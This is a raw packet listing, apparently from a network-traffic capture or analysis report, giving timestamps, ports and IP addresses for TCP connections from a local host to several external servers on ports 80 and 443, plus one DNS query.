                                                                                                                                                                          Jan 10, 2025 19:17:29.691540956 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.691579103 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.691586971 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.691593885 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.691631079 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.691637993 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.691680908 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.691684008 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.691698074 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.691745043 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.691760063 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.691827059 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.691833019 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.691976070 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.691982031 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.692039013 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.692879915 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.692939043 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.692994118 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693067074 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693069935 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693078995 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693124056 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693133116 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693175077 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693183899 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693231106 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693239927 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693305016 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693310976 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693355083 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693375111 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693381071 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693425894 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693429947 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693444014 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693470955 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693495989 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693501949 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693548918 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693592072 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693594933 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693603992 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693645000 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693685055 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693773031 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.693830967 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693892002 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693892002 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.693911076 CET44349916216.58.212.161192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.694233894 CET49916443192.168.2.5216.58.212.161
                                                                                                                                                                          Jan 10, 2025 19:17:29.973000050 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:29.977894068 CET8049937132.226.247.73192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:29.977973938 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:29.978159904 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:29.982933044 CET8049937132.226.247.73192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:30.647782087 CET8049937132.226.247.73192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:30.651956081 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:30.656744957 CET8049937132.226.247.73192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:30.859430075 CET8049937132.226.247.73192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:30.902465105 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:31.453071117 CET49947443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:31.453099966 CET44349947104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:31.453425884 CET49947443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:31.457024097 CET49947443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:31.457040071 CET44349947104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:31.941641092 CET44349947104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:31.941795111 CET49947443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:31.945100069 CET49947443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:31.945111036 CET44349947104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:31.945518017 CET44349947104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:31.949229002 CET49947443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:31.991336107 CET44349947104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:32.084039927 CET44349947104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:32.084206104 CET44349947104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:32.084377050 CET49947443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:32.088705063 CET49947443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:32.097290993 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:32.102032900 CET8049937132.226.247.73192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:32.308609962 CET8049937132.226.247.73192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:32.311026096 CET49955443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:32.311131954 CET44349955104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:32.311239958 CET49955443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:32.311610937 CET49955443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:32.311646938 CET44349955104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:32.355633974 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:32.870145082 CET44349955104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:32.871892929 CET49955443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:32.871927977 CET44349955104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:33.182410002 CET44349955104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:33.182481050 CET44349955104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:33.182638884 CET49955443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:33.183094025 CET49955443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:33.189603090 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:33.194575071 CET8049937132.226.247.73192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:33.194636106 CET4993780192.168.2.5132.226.247.73
                                                                                                                                                                          Jan 10, 2025 19:17:33.198304892 CET4996080192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:33.203119040 CET8049960193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:33.203197002 CET4996080192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:33.203332901 CET4996080192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:33.208184004 CET8049960193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:34.549654007 CET8049960193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:34.551527023 CET49969443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:34.551559925 CET44349969104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:34.551995039 CET49969443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:34.552156925 CET49969443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:34.552170038 CET44349969104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:34.605637074 CET4996080192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:35.005168915 CET44349969104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:35.006923914 CET49969443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:35.006946087 CET44349969104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:35.149892092 CET44349969104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:35.149965048 CET44349969104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:35.150015116 CET49969443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:35.151335001 CET49969443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:35.155278921 CET4997280192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:35.160077095 CET8049972193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:35.160165071 CET4997280192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:35.160285950 CET4997280192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:35.165072918 CET8049972193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:35.959270000 CET8049972193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:35.960747957 CET49977443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:35.960772038 CET44349977104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:35.960844994 CET49977443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:35.961114883 CET49977443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:35.961132050 CET44349977104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:36.011802912 CET4997280192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:36.428488970 CET44349977104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:36.430500031 CET49977443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:36.430527925 CET44349977104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:36.554831028 CET44349977104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:36.554982901 CET44349977104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:36.555214882 CET49977443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:36.555476904 CET49977443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:36.559030056 CET4997280192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:36.560164928 CET4998380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:36.563954115 CET8049972193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:36.564033031 CET4997280192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:36.564953089 CET8049983193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:36.565027952 CET4998380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:36.565121889 CET4998380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:36.569880009 CET8049983193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:37.435651064 CET8049983193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:37.436908960 CET49988443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:37.436939001 CET44349988104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:37.436995983 CET49988443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:37.437230110 CET49988443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:37.437251091 CET44349988104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:37.484780073 CET4998380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:37.928009033 CET44349988104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:37.930313110 CET49988443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:37.930339098 CET44349988104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:38.055710077 CET44349988104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:38.055785894 CET44349988104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:38.055861950 CET49988443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:38.056245089 CET49988443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:38.060034990 CET4998380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:38.060832024 CET4998980192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:38.065391064 CET8049983193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:38.065706968 CET8049989193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:38.065771103 CET4998380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:38.065805912 CET4998980192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:38.067591906 CET4998980192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:38.072458029 CET8049989193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:39.408058882 CET8049989193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:39.409640074 CET49990443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:39.409676075 CET44349990104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:39.409754038 CET49990443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:39.410037994 CET49990443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:39.410051107 CET44349990104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:39.449301958 CET4998980192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:39.882740021 CET44349990104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:39.884835005 CET49990443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:39.884869099 CET44349990104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:40.019303083 CET44349990104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:40.019393921 CET44349990104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:40.019464016 CET49990443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:40.020179033 CET49990443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:40.024324894 CET4998980192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:40.025747061 CET4999180192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:40.029349089 CET8049989193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:40.029531956 CET4998980192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:40.030539036 CET8049991193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:40.031338930 CET4999180192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:40.031338930 CET4999180192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:40.036139011 CET8049991193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:41.878340006 CET8049991193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:41.882280111 CET49992443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:41.882322073 CET44349992104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:41.882391930 CET49992443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:41.882683992 CET49992443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:41.882705927 CET44349992104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:41.933748007 CET4999180192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:42.365549088 CET44349992104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:42.367631912 CET49992443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:42.367660046 CET44349992104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:42.507798910 CET44349992104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:42.507879019 CET44349992104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:42.508097887 CET49992443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:42.508431911 CET49992443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:42.511699915 CET4999180192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:42.512504101 CET4999380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:42.516590118 CET8049991193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:42.516827106 CET4999180192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:42.517323971 CET8049993193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:42.517405987 CET4999380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:42.517492056 CET4999380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:42.522284031 CET8049993193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.143934965 CET8049993193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.145220995 CET49994443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:44.145308971 CET44349994104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.145380020 CET49994443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:44.145631075 CET49994443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:44.145642996 CET44349994104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.183676958 CET4999380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:44.635817051 CET44349994104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.637626886 CET49994443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:44.637640953 CET44349994104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.790776968 CET44349994104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.790960073 CET44349994104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.791094065 CET49994443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:44.791539907 CET49994443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:44.795742035 CET4999380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:44.797323942 CET4999580192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:44.800820112 CET8049993193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.800966024 CET4999380192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:44.802155972 CET8049995193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:44.802258968 CET4999580192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:44.802400112 CET4999580192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:44.807179928 CET8049995193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:45.442804098 CET8049995193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:45.444257021 CET49996443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:45.444303036 CET44349996104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:45.444427013 CET49996443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:45.444660902 CET49996443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:45.444667101 CET44349996104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:45.496177912 CET4999580192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:45.925822973 CET44349996104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:45.927685022 CET49996443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:45.927705050 CET44349996104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.061125994 CET44349996104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.061305046 CET44349996104.21.96.1192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.061408043 CET49996443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:46.062093019 CET49996443192.168.2.5104.21.96.1
                                                                                                                                                                          Jan 10, 2025 19:17:46.092827082 CET4999580192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:46.098067999 CET8049995193.122.6.168192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.098129034 CET4999580192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:46.101130962 CET49997443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:46.101167917 CET44349997149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.101233959 CET49997443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:46.101835012 CET49997443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:46.101844072 CET44349997149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.924567938 CET44349997149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.924693108 CET49997443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:46.926690102 CET49997443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:46.926700115 CET44349997149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.927253008 CET44349997149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:46.928936005 CET49997443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:46.971329927 CET44349997149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:47.167824984 CET44349997149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:47.167906046 CET44349997149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:47.167985916 CET49997443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:47.170164108 CET49997443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:53.037472963 CET4996080192.168.2.5193.122.6.168
                                                                                                                                                                          Jan 10, 2025 19:17:53.256320000 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:53.256361008 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:53.256486893 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:53.256830931 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:53.256845951 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:53.895303011 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:53.897187948 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:53.897207975 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:53.897319078 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:53.897325039 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:54.329468966 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:54.329688072 CET44349998149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:54.329761982 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:54.330233097 CET49998443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:55.853915930 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:55.853950977 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:55.854027987 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:55.854368925 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:55.854384899 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.497364044 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.506762028 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:56.506783009 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.506855965 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:56.506867886 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.857933998 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.858155966 CET44350000149.154.167.220192.168.2.5
                                                                                                                                                                          Jan 10, 2025 19:17:56.858231068 CET50000443192.168.2.5149.154.167.220
                                                                                                                                                                          Jan 10, 2025 19:17:56.858516932 CET50000443192.168.2.5149.154.167.220

                                                                                                                                                                          UDP Packets

                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Jan 10, 2025 19:17:24.801769018 CET5307253192.168.2.51.1.1.1
